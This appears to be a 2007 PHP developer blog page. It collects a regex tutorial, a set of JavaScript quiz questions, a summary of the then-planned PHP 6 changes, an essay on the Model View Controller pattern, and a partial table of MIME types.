PHP Developers

Tuesday, October 2, 2007

Regular Expression Tutorial, Learn How to Use and Get The Most out of Regular Expressions

In this tutorial, I will teach you all you need to know to be able to craft powerful time-saving regular expressions. I will start with the most basic concepts, so that you can follow this tutorial even if you know nothing at all about regular expressions yet.

But I will not stop there. I will also explain how a regular expression engine works on the inside, and alert you to the consequences. This will help you to understand quickly why a particular regex does not do what you initially expected. It will save you lots of guesswork and head scratching when you need to write more complex regexes.

What Regular Expressions Are Exactly - Terminology

Basically, a regular expression is a pattern describing a certain amount of text. Their name comes from the mathematical theory on which they are based. But we will not dig into that. Since most people, including myself, are too lazy to type it out, you will usually find the name abbreviated to regex or regexp. I prefer regex, because it is easy to pronounce the plural "regexes".

On this website, regular expressions are printed as regex. If your browser has proper support for cascading style sheets, the regex should be highlighted in red.

This first example is actually a perfectly valid regex. It is the most basic pattern, simply matching the literal text regex. A "match" is the piece of text, or sequence of bytes or characters, that the pattern was found to correspond to by the regex processing software. Matches are highlighted in blue on this site.

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b is a more complex pattern. It describes a series of letters, digits, dots, underscores, percentage signs, plus signs and hyphens, followed by an at sign, followed by another series of letters, digits, dots and hyphens, finally followed by a single dot and between two and four letters. In other words: this pattern describes an email address.

With the above regular expression pattern, you can search through a text file to find email addresses, or verify if a given string looks like an email address. In this tutorial, I will use the term "string" to indicate the text that I am applying the regular expression to. I will highlight strings in green.

The term "string" or "character string" is used by programmers to indicate a sequence of characters. In practice, you can use regular expressions with whatever data you can access using the application or programming language you are working with.
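As a rough illustration of applying the email pattern above to a string, here is a minimal PHP sketch using preg_match() from the PCRE extension. The function name looksLikeEmail is made up for this example, and the "i" modifier is an assumption added here because the pattern only lists the uppercase range A-Z.

```php
<?php
// Hypothetical helper: reports whether $subject contains something that
// looks like an email address, using the pattern quoted in the text.
function looksLikeEmail($subject)
{
    // The "i" modifier (an addition for this sketch) makes A-Z match
    // lowercase letters as well.
    $pattern = '/\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b/i';

    // preg_match() returns 1 when the pattern matches, 0 when it does not.
    return preg_match($pattern, $subject) === 1;
}

var_dump(looksLikeEmail('Write to john.doe@example.com today')); // bool(true)
var_dump(looksLikeEmail('no address here'));                     // bool(false)
```

Because the pattern is delimited by \b rather than anchored, this finds an address anywhere inside the string instead of requiring the whole string to be an address.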

Different Regular Expression Engines

A regular expression "engine" is a piece of software that can process regular expressions, trying to match the pattern to the given string. Usually, the engine is part of a larger application and you do not access the engine directly. Rather, the application will invoke it for you when needed, making sure the right regular expression is applied to the right file or data.

As usual in the software world, different regular expression engines are not fully compatible with each other. It is not possible to describe every kind of engine and regular expression syntax (or "flavor") in this tutorial. I will focus on the regex flavor used by Perl 5, for the simple reason that this regex flavor is the most popular one, and deservedly so. Many more recent regex engines are very similar, but not identical, to the one of Perl 5. Examples are the open source PCRE engine (used in many tools and languages like PHP), the .NET regular expression library, and the regular expression package included with version 1.4 and later of the Java JDK. I will point out to you whenever differences in regex flavors are important, and which features are specific to the Perl-derivatives mentioned above.

Give Regexes a First Try

You can easily try the following yourself in a text editor that supports regular expressions, such as EditPad Pro. If you do not have such an editor, you can download the free evaluation version of EditPad Pro to try this out. EditPad Pro's regex engine is fully functional in the demo version. As a quick test, copy and paste the text of this page into EditPad Pro. Then select Search|Show Search Panel from the menu. In the search pane that appears near the bottom, type in regex in the box labeled "Search Text". Mark the "Regular expression" checkbox, and click the Find First button. This is the leftmost button on the search panel. See how EditPad Pro's regex engine finds the first match. Click the Find Next button, which sits next to the Find First button, to find further matches. When there are no further matches, the Find Next button's icon will flash briefly.

Now try to search using the regex reg(ular expressions?|ex(p|es)?). This regex will find all names, singular and plural, I have used on this page to say "regex". If we only had plain text search, we would have needed 5 searches. With regexes, we need just one search. Regexes save you time when using a tool like EditPad Pro. Select Count Matches in the Search menu to see how many times this regular expression can match the file you have open in EditPad Pro.
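For readers without EditPad Pro, the same count can be sketched in PHP with preg_match_all(). The sample text below is invented for this example; it contains each of the five spellings exactly once.

```php
<?php
// Invented sample text containing all five spellings once each.
$text = 'A regular expression, or regex, is a pattern. Some people write regexp. '
      . 'The plural is regexes or regular expressions.';

// One pass over the text with the regex from the paragraph above.
// preg_match_all() returns the number of full matches found.
$count = preg_match_all('/reg(ular expressions?|ex(p|es)?)/', $text, $matches);

echo $count, "\n";      // 5
print_r($matches[0]);   // the five matched spellings, in order of appearance
```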

If you are a programmer, your software will run faster since even a simple regex engine applying the above regex once will outperform a state of the art plain text search algorithm searching through the data five times. Regular expressions also reduce development time. With a regex engine, it takes only one line (e.g. in Perl, PHP, Java or .NET) or a couple of lines (e.g. in C using PCRE) of code to, say, check if the user's input looks like a valid email address.

Friday, September 28, 2007

PHP, JavaScript & AJAX interview questions

1. Why do JavaScript and Java have similar names?

A. JavaScript is a stripped-down version of Java

B. JavaScript's syntax is loosely based on Java's

C. They both originated on the island of Java

D. None of the above

2. When a user views a page containing a JavaScript program, which machine actually executes the script?

A. The User's machine running a Web browser

B. The Web server

C. A central machine deep within Netscape's corporate offices

D. None of the above

3. ______ JavaScript is also called client-side JavaScript.

A. Microsoft

B. Navigator

C. LiveWire

D. Native

4. __________ JavaScript is also called server-side JavaScript.

A. Microsoft

B. Navigator

C. LiveWire

D. Native

5. What are variables used for in JavaScript Programs?

A. Storing numbers, dates, or other values

B. Varying randomly

C. Causing high-school algebra flashbacks

D. None of the above

6. _____ JavaScript statements embedded in an HTML page can respond to user events such as mouse-clicks, form input, and page navigation.

A. Client-side

B. Server-side

C. Local

D. Native

7. What should appear at the very end of your JavaScript?

The <script LANGUAGE="JavaScript">tag

A. The </script>

B. The <script>

C. The END statement

D. None of the above

8. Which of the following can't be done with client-side JavaScript?

A. Validating a form

B. Sending a form's contents by email

C. Storing the form's contents to a database file on the server

D. None of the above

9. Which of the following are capabilities of functions in JavaScript?

A. Return a value

B. Accept parameters and Return a value

C. Accept parameters

D. None of the above

10. Which of the following is not a valid JavaScript variable name?

A. 2names

B. _first_and_last_names

C. FirstAndLast

D. None of the above

11. ______ tag is an extension to HTML that can enclose any number of JavaScript statements.

A. <SCRIPT>

B. <BODY>

C. <HEAD>

D. <TITLE>

12. How does JavaScript store dates in a date object?

A. The number of milliseconds since January 1st, 1970

B. The number of days since January 1st, 1900

C. The number of seconds since Netscape's public stock offering.

D. None of the above

13. Which of the following attributes can hold the JavaScript version?

A. LANGUAGE

B. SCRIPT

C. VERSION

D. None of the above

14. What is the correct JavaScript syntax to write "Hello World"?

A. System.out.println("Hello World")

B. println ("Hello World")

C. document.write("Hello World")

D. response.write("Hello World")

15. Which of the following ways can be used to indicate the LANGUAGE attribute?

A. <LANGUAGE="JavaScriptVersion">

B. <SCRIPT LANGUAGE="JavaScriptVersion">

C. <SCRIPT LANGUAGE="JavaScriptVersion"> JavaScript statements…</SCRIPT>

D. <SCRIPT LANGUAGE="JavaScriptVersion"!> JavaScript statements…</SCRIPT>

16. Inside which HTML element do we put the JavaScript?

A. <js>

B. <scripting>

C. <script>

D. <javascript>

17. What is the correct syntax for referring to an external script called "abc.js"?

A. <script href="abc.js">

B. <script name="abc.js">

C. <script src="abc.js">

D. None of the above

18. Which types of image maps can be used with JavaScript?

A. Server-side image maps

B. Client-side image maps

C. Server-side image maps and Client-side image maps

D. None of the above

19. Which of the following navigator object properties is the same in both Netscape and IE?

A. navigator.appCodeName

B. navigator.appName

C. navigator.appVersion

D. None of the above

20. Which is the correct way to write a JavaScript array?

A. var txt = new Array(1:"tim",2:"kim",3:"jim")

B. var txt = new Array:1=("tim")2=("kim")3=("jim")

C. var txt = new Array("tim","kim","jim")

D. var txt = new Array="tim","kim","jim"

21. What does the <noscript> tag do?

A. Enclose text to be displayed by non-JavaScript browsers.

B. Prevents scripts on the page from executing.

C. Describes certain low-budget movies.

D. None of the above

22. If para1 is the DOM object for a paragraph, what is the correct syntax to change the text within the paragraph?

A. "New Text"?

B. para1.value="New Text";

C. para1.firstChild.nodeValue= "New Text";

D. para1.nodeValue="New Text";

23. JavaScript entities start with _______ and end with _________.

A. Semicolon, colon

B. Semicolon, Ampersand

C. Ampersand, colon

D. Ampersand, semicolon

24. Which of the following best describes JavaScript?

A. a low-level programming language.

B. a scripting language precompiled in the browser.

C. a compiled scripting language.

D. an object-oriented scripting language.

25. Choose the server-side JavaScript object?

A. FileUpLoad

B. Function

C. File

D. Date

26. Choose the client-side JavaScript object?

A. Database

B. Cursor

C. Client

D. FileUpLoad

27. Which of the following is not considered a JavaScript operator?

A. new

B. this

C. delete

D. typeof

28. ______method evaluates a string of JavaScript code in the context of the specified object.

A. Eval

B. ParseInt

C. ParseFloat

D. Efloat

29. Which of the following events fires when the form element loses the focus: <button>, <input>, <label>, <select>, <textarea>?

A. onfocus

B. onblur

C. onclick

D. ondblclick

30. The syntax of Eval is ________________

A. [objectName.]eval(numeric)

B. [objectName.]eval(string)

C. [EvalName.]eval(string)

D. [EvalName.]eval(numeric)

31. JavaScript is interpreted by _________

A. Client

B. Server

C. Object

D. None of the above

32. Using _______ statement is how you test for a specific condition.

A. Select

B. If

C. Switch

D. For

33. Which of the following is the structure of an if statement?

A. if (conditional expression is true) then execute this code end if

B. if (conditional expression is true) execute this code end if

C. if (conditional expression is true) { then execute this code }

D. if (conditional expression is true) then {execute this code}

34. How to create a Date object in JavaScript?

A. dateObjectName = new Date([parameters])

B. dateObjectName.new Date([parameters])

C. dateObjectName := new Date([parameters])

D. dateObjectName Date([parameters])

35. The _______ method of an Array object adds and/or removes elements from an array.

A. Reverse

B. Shift

C. Slice

D. Splice

36. To set up the window to capture all Click events, we use which of the following statements?

A. window.captureEvents(Event.CLICK);

B. window.handleEvents (Event.CLICK);

C. window.routeEvents(Event.CLICK );

D. window.raiseEvents(Event.CLICK );

37. Which tag(s) can handle mouse events in Netscape?

A. <IMG>

B. <A>

C. <BR>

D. None of the above

38. ____________ is the tainted property of a window object.

A. Pathname

B. Protocol

C. Defaultstatus

D. Host

39. To enable data tainting, the end user sets the _________ environment variable.

A. ENABLE_TAINT

B. MS_ENABLE_TAINT

C. NS_ENABLE_TAINT

D. ENABLE_TAINT_NS

40. In JavaScript, _________ is an object of the target language data type that encloses an object of the source language.

A. a wrapper

B. a link

C. a cursor

D. a form

41. When a JavaScript object is sent to Java, the runtime engine creates a Java wrapper of type ___________

A. ScriptObject

B. JSObject

C. JavaObject

D. Jobject

42. _______ class provides an interface for invoking JavaScript methods and examining JavaScript properties.

A. ScriptObject

B. JSObject

C. JavaObject

D. Jobject

43. _________ is a wrapped Java array, accessed from within JavaScript code.

A. JavaArray

B. JavaClass

C. JavaObject

D. JavaPackage

44. A ________ object is a reference to one of the classes in a Java package, such as netscape.javascript .

A. JavaArray

B. JavaClass

C. JavaObject

D. JavaPackage

45. The JavaScript exception is available to the Java code as an instance of __________

A. netscape.javascript.JSObject

B. netscape.javascript.JSException

C. netscape.plugin.JSException

D. None of the above

46. To automatically open the console when a JavaScript error occurs which of the following is added to prefs.js?

A. user_pref(" javascript.console.open_on_error", false);

B. user_pref("javascript.console.open_error ", true);

C. user_pref("javascript.console.open_error ", false);

D. user_pref("javascript.console.open_on_error", true);

47. To open a dialog box each time an error occurs, which of the following is added to prefs.js?

A. user_pref("javascript.classic.error_alerts", true);

B. user_pref("javascript.classic.error_alerts ", false);

C. user_pref("javascript.console.open_on_error ", true);

D. user_pref("javascript.console.open_on_error ", false);

48. The syntax of a blur method in a button object is ______________

A. Blur()

B. Blur(contrast)

C. Blur(value)

D. Blur(depth)

49. The syntax of capture events method for document object is ______________

A. captureEvents()

B. captureEvents(args eventType)

C. captureEvents(eventType)

D. captureEvents(eventVal)

50. The syntax of close method for document object is ______________

A. Close(doc)

B. Close(object)

C. Close(val)

D. Close()

Wednesday, August 29, 2007

Introducing PHP 6

As you may be aware, the core PHP group of developers all met in Paris on November the 11th and 12th 2005. The minutes from the meeting are fascinating reading, but there is a lot to go through. So I've gone through all of the points raised and chewed them over from a developer's point of view. Your comments as always are welcome.

Before I get started, however, I'd just like to make one thing very clear: what you read here (or in the original minutes) are in no way the 'fully 100% decided' end results / changes that we'll see in PHP6. They will most likely all be discussed further (on internals and wider), but even so we can take the information presented in the minutes as being the PHP team's most 'current' way of thinking about any given subject.

Unicode

Unicode support at present can be set on a per request basis. This equates to PHP having to store both Unicode and non-Unicode variants of class, method and function names in the symbol tables. In short - it uses up more resources. Their decision is to make the Unicode setting server wide, not request wide. Turning Unicode off where not required can help performance and they quote some string functions as being up to 300% slower and whole applications 25% slower as a result. The decision to move it to the php.ini in my mind does take the control away from the user, and puts it into the hands of the Web Host.

If you compile PHP yourself or are responsible for this on your servers then you may be interested to know that PHP 6 will require the ICU libs (regardless of whether Unicode is turned on or off). The build system will bail out if the required ICU libs cannot be found. In a nutshell, you'll have another thing to install if you want to compile PHP.

Register Globals to go

Say goodbye folks, this one is finally going. It will no longer be an ini file setting, and if found it will raise an E_CORE_ERROR, pointing you to the documentation on why it's "bad". This means that PHP6 will finally break all PHP3 era scripts (or any script using reg globals) with no recourse at all but to re-code it. That's a bold move, but a needed one.

Magic Quotes to go

The magic quotes feature of PHP will be going, and as with register globals it's going to raise an E_CORE_ERROR if the setting is found anywhere. This will affect magic_quotes, magic_quotes_sybase and magic_quotes_gpc.

Safe Mode to go

This may please developers who have web hosts that insist upon safe mode! But it will now go totally, again raising an E_CORE_ERROR if found. The reason is that apparently they felt it gave the 'wrong signal', implying that it made PHP secure, when in fact it didn't at all. open_basedir will (thankfully) be kept.

'var' to alias 'public'

PHP4 used 'var' within classes. PHP5 (in its OO move) caused this to raise a warning under E_STRICT. This warning will be removed in PHP6 and instead 'var' will mean the same thing as 'public'. This is a nice move, but if anyone has updated their scripts to work under E_STRICT in PHP5 it will be a redundant one for them.

Return by Reference will error

Both '$foo =& new StdClass()' and 'function &foo' will now raise an E_STRICT error.

zend.ze1 compatibility mode to go

ze1 always tried to retain old PHP4 behaviour, but apparently it "doesn't work 100%" anyway, so it will be removed totally and throw an E_CORE_ERROR if detected.

Freetype 1 and GD 1 support to go

Support for both of these (very very old) libs will be removed.

dl() moves to SAPI only

Each SAPI will register the use of this function as required, only the CLI and embed SAPIs will do this from now on. It will not be available elsewhere.

FastCGI always on

The FastCGI code will be cleaned up and always enabled for the CGI SAPI, it will not be able to be disabled.

Register Long Arrays to go

Remember the HTTP_*_VARS globals from yesteryear? Well if you're not already using $_GET, $_POST, etc - start doing so now, because the option to enable long arrays is going (and will throw an E_CORE_ERROR).

Extension Movements

The XMLReader and XMLWriter extensions will move into the core distribution and will be on by default.

The ereg extension will move to PECL (and thus be removed from PHP). This means that PCRE will not be allowed to be disabled. This will make way for the new regular expression extension based on ICU.

The extremely useful Fileinfo extension will move into the core distribution and be enabled by default.

PHP Engine Additions

64 bit integers
A new 64 bit integer will be added (int64). There will be no int32 (it is assumed unless you specify int64)

Goto
No 'goto' command will be added, but the break keyword will be extended with a static label - so you could do 'break foo' and it'll jump to the label foo: in your code.

ifsetor()
It looks like we won't be seeing this one, which is a shame. But instead the ?: operator will have the 'middle parameter' requirement dropped, which means you'd be able to do something like this: "$foo = $_GET['foo'] ?: 42;" (i.e. if $_GET['foo'] evaluates to true, $foo will equal it; otherwise $foo will equal 42). This should save some code, but I personally don't think it is as 'readable' as ifsetor would have been.
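To make the behaviour of the shortened ?: concrete, here is a small sketch written against the form in which the operator later shipped in PHP 5.3. The $input array is a stand-in for $_GET (an assumption so the snippet runs from the command line).

```php
<?php
// $input stands in for $_GET in this sketch.
$input = array('foo' => '7', 'bar' => '');

// "a ?: b" yields a when a evaluates to true, otherwise b.
$foo = $input['foo'] ?: 42;   // '7' is truthy, so $foo is '7'
$bar = $input['bar'] ?: 42;   // '' is falsy, so $bar is 42

var_dump($foo); // string(1) "7"
var_dump($bar); // int(42)
```

Note that the left operand is still read as usual, so an index that does not exist is still reported by PHP; that is one way this differs from what ifsetor() was meant to do.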

foreach multi-dim arrays
This is a nice change - you'll be able to foreach through array lists, i.e. "foreach( $a as $k => list($a, $b))".
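A short sketch of what this looks like, using the syntax as it later shipped in PHP 5.5. The $points data and variable names are invented for the example.

```php
<?php
// Invented sample data: each value is itself a two-element list.
$points = array(
    'origin' => array(0, 0),
    'corner' => array(3, 4),
);

$lines = array();

// list() unpacks each nested array directly in the foreach header.
foreach ($points as $name => list($x, $y)) {
    $lines[] = "$name: x=$x, y=$y";
}

echo implode("\n", $lines), "\n";
// origin: x=0, y=0
// corner: x=3, y=4
```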

{} vs []
You can currently use both {} and [] to access string indexes. But the {} notation will raise an E_STRICT in PHP5.1 and will be gone totally in PHP6. Also the [] version will gain substr and array_slice functionality directly - so you could do "[2,]" to access characters 2 to the end, etc. Very handy.

OO changes

Static Binding
A new keyword will be created to allow for late static binding - static::static2(), this will perform runtime evaluation of statics.
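The difference that late static binding makes can be sketched as follows, using the static:: form as it later shipped in PHP 5.3. The class and method names are hypothetical.

```php
<?php
class Model
{
    public static function tableName()
    {
        return 'models';
    }

    public static function describe()
    {
        // static:: is resolved at run time to the class the call was made on.
        // self::tableName() here would always call Model::tableName().
        return static::tableName();
    }
}

class User extends Model
{
    public static function tableName()
    {
        return 'users';
    }
}

echo User::describe(), "\n";  // users
echo Model::describe(), "\n"; // models
```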

Namespaces
It looks like this one is still undecided - if they do implement namespaces it will be using their style only. My advice? Don't hold your breath!

Type-hinted Return Values
Although they decided against allowing type-hinted properties (because it's "not the PHP way") they will add support for type-hinted return values, but have yet to decide on a syntax for this. Even so, it will be a nice addition.

Calling dynamic functions as static will E_FATAL
At the moment you can call any method with either the static or the dynamic call syntax, whether it is declared static or not. In PHP6, calling a dynamic function with the static call syntax will raise an E_FATAL.

Additions to PHP

APC to be in the core distribution
The opcode cache APC will be included in the core distribution of PHP as standard, it will not however be turned on by default (but having it there saves the compilation of yet another thing on your server, and web hosts are more likely to allow it to be enabled)

Hardened PHP patch
This patch implements a bunch of extra security checks in PHP. They went over it and the following changes will now take place within PHP: Protection against HTTP Response Splitting will be included. allow_url_fopen will be split into two: allow_url_fopen and allow_url_include. allow_url_fopen will be enabled by default. allow_url_include will be disabled by default.

E_STRICT merges into E_ALL
Wow, this is quite a serious one! E_STRICT level messages will be added to E_ALL by default. This shows a marked move by the PHP team to educate developers on 'best practises' and to display language-level warnings in a "Hey, you're doing it the wrong way" manner.

Farewell
They will remove support for the ASP style tags, but the PHP short-code tag will remain (

Conclusion

PHP6 is taking an interesting move in my mind - it's as if the PHP developers want to now educate developers about the right way to code something, and remove those lingering issues with "Well you SHOULD be doing it this way, but you can still do it the old way". This will not be the case any longer. Removing totally the likes of register globals, magic quotes, long arrays, {} string indexes and call-time-pass-by-references will force developers to clean up their code.

It will also break a crapload of scripts beyond any repair that doesn't involve some serious re-writing. Is this a bad thing? I don't think so myself, but I see it making the adoption of PHP6 even slower than that of PHP5, which is a real shame. However they have to leap this hurdle at some point, and once they've done it progression to future versions should be swifter.

Model View Controller

The Model View Controller pattern is popular for organizing Web applications. Yet, there is quite a bit of confusion surrounding MVC. What exactly is it? Whatever it is, it must be good. Like object orientation, MVC seems to have earned a halo. It has a reputation for being a good design practice. Therefore, in a strange twist of logic, anyone who creates a good design must be using MVC, right? Much like good practices that have nothing to do with objects are lumped under that general term, good practices that have little to do with MVC are lumped under that term. A precise definition of MVC is probably impossible.

That said, we do have an historical record to fall back on. MVC was introduced as a graphical user interface organizational principle in Smalltalk in the late 1970s. A later paper, “Applications Programming in Smalltalk-80: How to use Model-View-Controller (MVC),” describes the Smalltalk implementation. From this and other papers dating from the early Smalltalk years, we can gain insight into the original intent of the MVC pattern.

The original intent of the MVC pattern was to structure an application with a user interface in order to make certain kinds of changes easier. As I discussed in my first column, “Organizing for Change”, it can be a good idea to segregate different kinds of code in an application, based on the changes that one is likely to make. For programs with user interfaces, it is generally considered a good idea to separate the user interface related code from the domain-related code. This is because those kinds of code tend to change for different reasons and at different times. Separating the two allows the programmer to make a change in one without having to touch the other.

Separating the user interface from the domain logic also allows one implementation to be swapped with another. Different views and controllers can be substituted to provide alternate user interfaces for the same model. For example, the same model data can be displayed as a bar graph, or a pie chart, or a spreadsheet.

But wait! The Model View Controller pattern has three segments. To separate the user interface from the domain logic, it would seem that only two would be needed. Why three? This goes back to the original metaphor upon which MVC is based. Conceptually, MVC is intended to replicate an abstract data processing model. In that model, data is fed into a computer as input. A processor uses that data to perform some task. Then some kind of output is produced. Notice that there are three stages in that process. These three stages correspond to the model, view, and controller segmentation of the MVC pattern.

Perhaps the most obvious correspondence is the view. This is obviously the output portion of the program. Working back from the end of the process, the model segment of the program corresponds to the processing component. Unfortunately, when many people think of the word ‘model’, they think of data, nouns and structure. In MVC, ‘model’ corresponds to ‘processor’. You should also think in terms of verbs when you think of the model. The model is where the stuff gets done that the program is designed to do.

The remaining segment, and the one that seems most confusing, is the controller. The controller corresponds to the input phase of our data processing abstraction. It receives input and translates that input to requests on the model or the view. Why is the controller so confusing? Well, if your model is verb shy, you have to put the behavioral aspect of your domain logic somewhere. Often people will separate out the view or output logic, separate out the data storage logic, and then consider that anything else left must be the controller, right? Well, no.

You see, while MVC is a way of separating the user interface from the domain logic, not every way of achieving this separation is MVC. Not every method of structuring a user interface is MVC. In Smalltalk MVC, the idea of having a separate controller layer for input allows an input method to be changed without changing either the view or the model. For example, in a spreadsheet program, a different controller would handle mouse input or handle keyboard input, but the model and view objects would be the same.

Fair enough, but how many times in a Web application do you want to swap out input methods without also changing the corresponding output? There is a strong coupling between the input and output methods of a program. It can be hard to change one without changing the other. Another common UI organization pattern is called Document/View. Document/View collapses the input and output layers of MVC into a single view layer. Document/View is a good way of separating your user interface from domain logic, but it is not MVC. We pay a price for dividing our applications into three parts.

The Model

The model encapsulates the functional core of an application, its domain logic. The goal of MVC is to make the model independent of the view and controller, which together form the user interface of the application. A model could conceivably be used with multiple different view-controller interface pairings. Since the model must be independent, it cannot refer to either the view or controller portions of the application. The model may not hold direct instance variables that refer to the view or the controller. It passively supplies its services and data to the other layers of the application.

In fact, there is a variation on the model layer typically used with Web applications, called a passive model. With a passive model, the objects used in the model are completely unaware of being used in the MVC triad. The controller notifies the view when it executes an operation on the model that will require the view to be updated.

In another version more traditional to MVC, the active model, model classes define a change notification mechanism, typically using the Observer pattern. This allows unrelated view and controller components to be notified when the model has changed. Since these components register themselves with the model, and the model has no knowledge of any specific view or controller, this does not break the independence of the model. This notification mechanism is behind the immediate updating that is the hallmark of an MVC GUI application.

The passive model is commonly used in Web MVC. The strict request/response cycle of HTTP does not require the immediacy of an active model. The view is always rendered anew on every cycle, regardless of changes. This may be especially true in PHP, where no state is retained between requests.
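The active model's change notification can be sketched in a few lines of PHP. This is only an illustration of the Observer idea under assumed names (Account, BalanceListener and BalanceView are all hypothetical): the model knows an interface, never a concrete view or controller.

```php
<?php
// Hypothetical listener interface: the only thing the model knows about.
interface BalanceListener
{
    public function balanceChanged(Account $account);
}

// Active model: holds domain state and notifies whoever registered.
class Account
{
    private $balance = 0;
    private $listeners = array();

    public function addListener(BalanceListener $listener)
    {
        $this->listeners[] = $listener;
    }

    public function deposit($amount)
    {
        $this->balance += $amount;
        // Change propagation: tell every registered component.
        foreach ($this->listeners as $listener) {
            $listener->balanceChanged($this);
        }
    }

    public function getBalance()
    {
        return $this->balance;
    }
}

// A view registers itself and re-renders whenever it is notified.
class BalanceView implements BalanceListener
{
    public $rendered = array();

    public function balanceChanged(Account $account)
    {
        $this->rendered[] = 'Balance: ' . $account->getBalance();
    }
}

$account = new Account();
$view = new BalanceView();
$account->addListener($view);
$account->deposit(50);
$account->deposit(-20);

print_r($view->rendered); // two entries: "Balance: 50" and "Balance: 30"
```

In a passive model the listener list would disappear from Account, and the controller would ask the view to render after calling deposit().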

The View

The view obtains data from the model and presents it to the user. It represents the output of the application. The view can be implemented using a variety of techniques, including templates, or a transformative method like XSL. One major misconception I see in beginner questions about MVC is that the view must somehow remain separate from the model. This line of thinking causes frustration with MVC. Programmers end up creating controllers that shuffle data from the model into the view. This is unnecessary. The view usually has a direct dependency on the model. If you change the model, you must also change the view. Because the view depends on the model, the view can generally have free access to the model.

Well, almost free access. Views are read-only representations of the state of the model. They should not attempt to modify the model; this would be a violation of the MVC separation. Attempting to modify the model in the view would indicate a mixing of controller code into the view layer. A far more common and insidious violation of separations occurs when domain model code leaks into the view. For example, consider the requirement “Show negative balances in red.” At first glance, this appears to be strictly an output requirement and a test might be placed into the view in roughly this form: if balance < 0, display in red.

Can you spot the violation of separations? Upon further analysis, it turns out that the real requirement is “show overdrawn balances in red.” The definition of overdrawn, here balance < 0, belongs in the domain model, not in the view. In this way, changes to the definition of ‘overdrawn’ can be made independently of decisions about how to display the status of being overdrawn.
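One way to keep that rule in the model is sketched below. The Account class, the isOverdrawn() method and the renderBalance() function are hypothetical names chosen for the illustration; the view only asks the model a question and decides how to present the answer.

```php
<?php
class Account
{
    private $balance;

    public function __construct($balance)
    {
        $this->balance = $balance;
    }

    public function getBalance()
    {
        return $this->balance;
    }

    // Domain rule: the definition of "overdrawn" lives in the model, so it
    // can later change (say, to allow a credit line) without touching views.
    public function isOverdrawn()
    {
        return $this->balance < 0;
    }
}

// View code: reads from the model and only decides on presentation.
function renderBalance(Account $account)
{
    $class = $account->isOverdrawn() ? 'overdrawn' : 'ok';
    return '<span class="' . $class . '">'
         . number_format($account->getBalance(), 2)
         . '</span>';
}

echo renderBalance(new Account(-12.5)), "\n"; // <span class="overdrawn">-12.50</span>
echo renderBalance(new Account(40)), "\n";    // <span class="ok">40.00</span>
```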

The Controller

The controller receives and translates input to requests on the model or view. Controllers are typically responsible for calling methods on the model that change the state of the model. In an active model, this state change is then reflected in the view via the change propagation mechanism. A passive model shifts more responsibility into the controller, as the controller must notify the views when they should update. In traditional Smalltalk MVC, views and controllers are tightly coupled. Each view instance is associated with a single unique controller instance, and vice versa. The controller is considered a strategy that the view uses for input. The view is also responsible for creating new views and controllers. Modern Web usage of MVC shifts even more of the traditional responsibilities of the view to the controller. The controller becomes responsible for creating and selecting views, and the view tends to lose responsibility for its controller. Sometimes, responsibility for creating and selecting views is delegated to a specific object; this is known as the Application Controller pattern for Web MVC, or the View Handler pattern for GUI MVC. You can see that, as with the view, the controller also has a direct dependency on the model. Changes to the model layer will often trigger corresponding changes in the controller layer. Of course, the reverse should not be true. Unfortunately, as with the view, it is easy for domain logic to leak out of the domain layer and into the controller. This is especially true when the domain model is considered to be passive, verb-deprived data. This is a big challenge for modern MVC frameworks for the Web. The controller can be an inviting place for quick and dirty unstructured code.
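A minimal Web-style arrangement with a passive model might look like the sketch below. All names (Counter, counterView, CounterController) are invented, and the $request array stands in for $_POST; the point is only that the controller translates input into a request on the model and then selects the view, while the domain behaviour stays in the model.

```php
<?php
// Passive model: unaware of any view or controller.
class Counter
{
    private $value = 0;

    public function increment()
    {
        $this->value++;
    }

    public function getValue()
    {
        return $this->value;
    }
}

// View: a read-only rendering of the model's state.
function counterView(Counter $counter)
{
    return 'Count: ' . $counter->getValue();
}

// Controller: translates input into model requests, then picks the view.
class CounterController
{
    private $model;

    public function __construct(Counter $model)
    {
        $this->model = $model;
    }

    // $request stands in for $_POST in this sketch.
    public function handle(array $request)
    {
        if (isset($request['action']) && $request['action'] === 'increment') {
            $this->model->increment(); // the "verb" stays in the model
        }
        return counterView($this->model);
    }
}

$controller = new CounterController(new Counter());
echo $controller->handle(array('action' => 'increment')), "\n"; // Count: 1
echo $controller->handle(array()), "\n";                        // Count: 1
```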

Thursday, August 16, 2007

Mime Types

MIME Types By Content Type

Type/sub-type	Extension
application/envoy	evy
application/fractals	fif
application/futuresplash	spl
application/hta	hta
application/internet-property-stream	acx
application/mac-binhex40	hqx
application/msword	doc
application/msword	dot
application/octet-stream	*
application/octet-stream	bin
application/octet-stream	class
application/octet-stream	dms
application/octet-stream	exe
application/octet-stream	lha
application/octet-stream	lzh
application/oda	oda
application/olescript	axs
application/pdf	pdf
application/pics-rules	prf
application/pkcs10	p10
application/pkix-crl	crl
application/postscript	ai
application/postscript	eps
application/postscript	ps
application/rtf	rtf
application/set-payment-initiation	setpay
application/set-registration-initiation	setreg
application/vnd.ms-excel	xla
application/vnd.ms-excel	xlc
application/vnd.ms-excel	xlm
application/vnd.ms-excel	xls
application/vnd.ms-excel	xlt
application/vnd.ms-excel	xlw
application/vnd.ms-outlook	msg
application/vnd.ms-pkicertstore	sst
application/vnd.ms-pkiseccat	cat
application/vnd.ms-pkistl	stl
application/vnd.ms-powerpoint	pot
application/vnd.ms-powerpoint	pps
application/vnd.ms-powerpoint	ppt
application/vnd.ms-project	mpp
application/vnd.ms-works	wcm
application/vnd.ms-works	wdb
application/vnd.ms-works	wks
application/vnd.ms-works	wps
application/winhlp	hlp
application/x-bcpio	bcpio
application/x-cdf	cdf
application/x-compress	z
application/x-compressed	tgz
application/x-cpio	cpio
application/x-csh	csh
application/x-director	dcr
application/x-director	dir
application/x-director	dxr
application/x-dvi	dvi
application/x-gtar	gtar
application/x-gzip	gz
application/x-hdf	hdf
application/x-internet-signup	ins
application/x-internet-signup	isp
application/x-iphone	iii
application/x-javascript	js
application/x-latex	latex
application/x-msaccess	mdb
application/x-mscardfile	crd
application/x-msclip	clp
application/x-msdownload	dll
application/x-msmediaview	m13
application/x-msmediaview	m14
application/x-msmediaview	mvb
application/x-msmetafile	wmf
application/x-msmoney	mny
application/x-mspublisher	pub
application/x-msschedule	scd
application/x-msterminal	trm
application/x-mswrite	wri
application/x-netcdf	cdf
application/x-netcdf	nc
application/x-perfmon	pma
application/x-perfmon	pmc
application/x-perfmon	pml
application/x-perfmon	pmr
application/x-perfmon	pmw
application/x-pkcs12	p12
application/x-pkcs12	pfx
